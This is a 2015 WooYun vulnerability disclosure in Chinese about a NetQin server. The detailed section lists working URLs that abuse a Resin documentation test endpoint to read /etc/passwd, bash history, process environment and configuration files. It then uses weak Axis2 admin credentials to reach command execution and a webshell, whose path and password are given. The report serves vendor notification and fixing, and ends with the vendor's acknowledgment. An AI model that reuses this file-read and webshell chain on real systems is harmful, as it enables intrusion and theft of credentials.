当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118888

漏洞标题:网秦某系统从任意文件读取到getshell

相关厂商:netqin.com

漏洞作者: 茜茜公主

提交时间:2015-06-19 11:22

修复时间:2015-08-03 16:26

公开时间:2015-08-03 16:26

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-19: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-29: 细节向核心白帽子及相关领域专家公开
2015-07-09: 细节向普通白帽子公开
2015-07-19: 细节向实习白帽子公开
2015-08-03: 细节向公众公开

简要描述:

文件读取、getshell

详细说明:

ip:http://211.151.59.42
文件读取

http://211.151.59.42/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
http://211.151.59.42/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history
http://211.151.59.42/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts
http://211.151.59.42/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/proc/self/environ
http://211.151.59.42/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/usr/local/resin-3.0.21/conf/resin.conf


QQ截图20150607211907.jpg


QQ截图20150607211544.jpg


QQ截图20150607211700.jpg

漏洞证明:

在/root/.bash_history文件中,我发现了这么一段

QQ截图20150607211831.jpg


所以我尝试了弱口令http://211.151.59.42/axis2/axis2-admin/
admin/axis2

QQ截图20150607212106.jpg


在这里我们也可以通过resin读出axis2的口令

http://211.151.59.42/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/usr/local/resin-3.0.21/webapps/axis2/WEB-INF/conf/axis2.xml


QQ截图20150607212219.jpg


之后可利用axis2上传webshell

http://211.151.59.42/axis2/services/Cat/exec?cmd=whoami


QQ截图20150607210247.jpg


QQ截图20150607210302.jpg


QQ截图20150607212446.jpg


/usr/local/resin-3.0.21/webapps/WEB-INF/classes/


一句话地址:http://211.151.59.42/axis2/wooyun.jsp
密码:woo0yun

QQ截图20150607214008.jpg


QQ截图20150607214638.jpg


QQ截图20150607215235.jpg


http://211.151.59.42/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/usr/local/resin-3.0.21/log/stdout.log


QQ截图20150607215641.jpg

修复方案:

删除resin-doc,axis2强口令

版权声明:转载请注明来源 茜茜公主@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-06-19 16:24

厂商回复:

多谢你的扫描和支持,我们会进一步提高我们的安全管理。

最新状态:

暂无